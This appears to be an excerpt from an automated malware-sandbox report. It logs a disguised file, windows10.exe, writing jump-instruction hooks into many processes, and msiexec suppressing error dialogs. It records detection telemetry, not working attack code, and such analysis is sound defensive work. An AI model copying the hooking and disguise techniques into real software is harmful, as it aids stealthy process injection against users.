            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 740005 value: E9 2B BA 78 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 76ECBA30 value: E9 DA 45 87 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 760008 value: E9 8B 8E 7B 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 76F18E90 value: E9 80 71 84 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 780005 value: E9 8B 4D 47 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 75BF4D90 value: E9 7A B2 B8 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 7A0005 value: E9 EB EB 46 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 75C0EBF0 value: E9 1A 14 B9 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 7B0005 value: E9 8B 8A 82 74 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 74FD8A90 value: E9 7A 75 7D 8B Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 3A40005 value: E9 2B 02 5C 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6388 base: 75000230 value: E9 DA FD A3 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 2420005 value: E9 8B 2F AE 74 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 76F02F90 value: E9 7A D0 51 8B Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 2480005 value: E9 2B BA A4 74 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 76ECBA30 value: E9 DA 45 5B 8B Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 2490008 value: E9 8B 8E A8 74 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 76F18E90 value: E9 80 71 57 8B Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 25C0005 value: E9 8B 4D 63 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 75BF4D90 value: E9 7A B2 9C 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 25D0005 value: E9 EB EB 63 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 75C0EBF0 value: E9 1A 14 9C 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 25E0005 value: E9 8B 8A 9F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 74FD8A90 value: E9 7A 75 60 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 25F0005 value: E9 2B 02 A1 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7376 base: 75000230 value: E9 DA FD 5E 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 600005 value: E9 8B 2F 90 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 76F02F90 value: E9 7A D0 6F 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 630005 value: E9 2B BA 89 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 76ECBA30 value: E9 DA 45 76 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 690008 value: E9 8B 8E 88 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 76F18E90 value: E9 80 71 77 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A00005 value: E9 8B 4D 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 75BF4D90 value: E9 7A B2 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A10005 value: E9 EB EB 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 75C0EBF0 value: E9 1A 14 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A20005 value: E9 8B 8A 5B 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 74FD8A90 value: E9 7A 75 A4 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 3A30005 value: E9 2B 02 5D 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7216 base: 75000230 value: E9 DA FD A2 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 6A0005 value: E9 8B 2F 86 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 76F02F90 value: E9 7A D0 79 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 38C0005 value: E9 2B BA 60 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 76ECBA30 value: E9 DA 45 9F 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 38D0008 value: E9 8B 8E 64 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 76F18E90 value: E9 80 71 9B 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A00005 value: E9 8B 4D 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 75BF4D90 value: E9 7A B2 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A10005 value: E9 EB EB 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 75C0EBF0 value: E9 1A 14 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A30005 value: E9 8B 8A 5A 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 74FD8A90 value: E9 7A 75 A5 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 3A40005 value: E9 2B 02 5C 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7192 base: 75000230 value: E9 DA FD A3 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 6D0005 value: E9 8B 2F 83 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 76F02F90 value: E9 7A D0 7C 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 37C0005 value: E9 2B BA 70 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 76ECBA30 value: E9 DA 45 8F 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 37D0008 value: E9 8B 8E 74 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 76F18E90 value: E9 80 71 8B 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A00005 value: E9 8B 4D 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 75BF4D90 value: E9 7A B2 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A10005 value: E9 EB EB 1F 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 75C0EBF0 value: E9 1A 14 E0 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A20005 value: E9 8B 8A 5B 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 74FD8A90 value: E9 7A 75 A4 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 3A30005 value: E9 2B 02 5D 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6800 base: 75000230 value: E9 DA FD A2 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 600005 value: E9 8B 2F 90 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 76F02F90 value: E9 7A D0 6F 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 740005 value: E9 2B BA 78 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 76ECBA30 value: E9 DA 45 87 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 750008 value: E9 8B 8E 7C 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 76F18E90 value: E9 80 71 83 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 770005 value: E9 8B 4D 48 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 75BF4D90 value: E9 7A B2 B7 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 3800005 value: E9 EB EB 40 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 75C0EBF0 value: E9 1A 14 BF 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 3810005 value: E9 8B 8A 7C 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 74FD8A90 value: E9 7A 75 83 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 3820005 value: E9 2B 02 7E 71 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6600 base: 75000230 value: E9 DA FD 81 8E Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 7E0005 value: E9 8B 2F 72 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 76F02F90 value: E9 7A D0 8D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 800005 value: E9 2B BA 6C 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 76ECBA30 value: E9 DA 45 93 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 37D0008 value: E9 8B 8E 74 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 76F18E90 value: E9 80 71 8B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3800005 value: E9 8B 4D 3F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 75BF4D90 value: E9 7A B2 C0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3810005 value: E9 EB EB 3F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 75C0EBF0 value: E9 1A 14 C0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3820005 value: E9 8B 8A 7B 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 74FD8A90 value: E9 7A 75 84 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 3830005 value: E9 2B 02 7D 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6748 base: 75000230 value: E9 DA FD 82 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 2570005 value: E9 8B 2F 99 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 76F02F90 value: E9 7A D0 66 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 2590005 value: E9 2B BA 93 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 76ECBA30 value: E9 DA 45 6C 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 25A0008 value: E9 8B 8E 97 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 76F18E90 value: E9 80 71 68 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 26D0005 value: E9 8B 4D 52 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 75BF4D90 value: E9 7A B2 AD 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 26E0005 value: E9 EB EB 52 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 75C0EBF0 value: E9 1A 14 AD 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 26F0005 value: E9 8B 8A 8E 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 74FD8A90 value: E9 7A 75 71 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 2700005 value: E9 2B 02 90 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6432 base: 75000230 value: E9 DA FD 6F 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 6D0005 value: E9 8B 2F 83 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 76F02F90 value: E9 7A D0 7C 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 840005 value: E9 2B BA 68 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 76ECBA30 value: E9 DA 45 97 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 850008 value: E9 8B 8E 6C 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 76F18E90 value: E9 80 71 93 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 870005 value: E9 8B 4D 38 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 75BF4D90 value: E9 7A B2 C7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 880005 value: E9 EB EB 38 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 75C0EBF0 value: E9 1A 14 C7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 890005 value: E9 8B 8A 74 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 74FD8A90 value: E9 7A 75 8B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 8A0005 value: E9 2B 02 76 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2120 base: 75000230 value: E9 DA FD 89 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 6E0005 value: E9 8B 2F 82 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 76F02F90 value: E9 7A D0 7D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 740005 value: E9 2B BA 78 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 76ECBA30 value: E9 DA 45 87 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 750008 value: E9 8B 8E 7C 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 76F18E90 value: E9 80 71 83 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 770005 value: E9 8B 4D 48 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 75BF4D90 value: E9 7A B2 B7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 780005 value: E9 EB EB 48 75
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 75C0EBF0 value: E9 1A 14 B7 8A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 790005 value: E9 8B 8A 84 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 74FD8A90 value: E9 7A 75 7B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 25E0005 value: E9 2B 02 A2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7260 base: 75000230 value: E9 DA FD 5D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 2420005 value: E9 8B 2F AE 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 76F02F90 value: E9 7A D0 51 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 2440005 value: E9 2B BA A8 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 76ECBA30 value: E9 DA 45 57 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 2450008 value: E9 8B 8E AC 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 76F18E90 value: E9 80 71 53 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25C0005 value: E9 8B 4D 63 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 75BF4D90 value: E9 7A B2 9C 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25D0005 value: E9 EB EB 63 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 75C0EBF0 value: E9 1A 14 9C 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25E0005 value: E9 8B 8A 9F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 74FD8A90 value: E9 7A 75 60 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 25F0005 value: E9 2B 02 A1 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6680 base: 75000230 value: E9 DA FD 5E 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 6E0005 value: E9 8B 2F 82 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 76F02F90 value: E9 7A D0 7D 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 740005 value: E9 2B BA 78 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 76ECBA30 value: E9 DA 45 87 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 2590008 value: E9 8B 8E 98 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 76F18E90 value: E9 80 71 67 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25B0005 value: E9 8B 4D 64 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 75BF4D90 value: E9 7A B2 9B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25C0005 value: E9 EB EB 64 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 75C0EBF0 value: E9 1A 14 9B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25D0005 value: E9 8B 8A A0 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 74FD8A90 value: E9 7A 75 5F 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 25E0005 value: E9 2B 02 A2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 6728 base: 75000230 value: E9 DA FD 5D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 2420005 value: E9 8B 2F AE 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 76F02F90 value: E9 7A D0 51 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 2480005 value: E9 2B BA A4 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 76ECBA30 value: E9 DA 45 5B 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 2490008 value: E9 8B 8E A8 74
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 76F18E90 value: E9 80 71 57 8B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24B0005 value: E9 8B 4D 74 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 75BF4D90 value: E9 7A B2 8B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24C0005 value: E9 EB EB 74 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 75C0EBF0 value: E9 1A 14 8B 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24D0005 value: E9 8B 8A B0 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 74FD8A90 value: E9 7A 75 4F 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 24E0005 value: E9 2B 02 B2 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2588 base: 75000230 value: E9 DA FD 4D 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 600005 value: E9 8B 2F 90 76
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 76F02F90 value: E9 7A D0 6F 89
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 39D0005 value: E9 2B BA 4F 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 76ECBA30 value: E9 DA 45 B0 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 39E0008 value: E9 8B 8E 53 73
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 76F18E90 value: E9 80 71 AC 8C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A00005 value: E9 8B 4D 1F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 75BF4D90 value: E9 7A B2 E0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A10005 value: E9 EB EB 1F 72
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 75C0EBF0 value: E9 1A 14 E0 8D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A20005 value: E9 8B 8A 5B 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 74FD8A90 value: E9 7A 75 A4 8E
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 3A30005 value: E9 2B 02 5D 71
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 2492 base: 75000230 value: E9 DA FD A2 8E
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
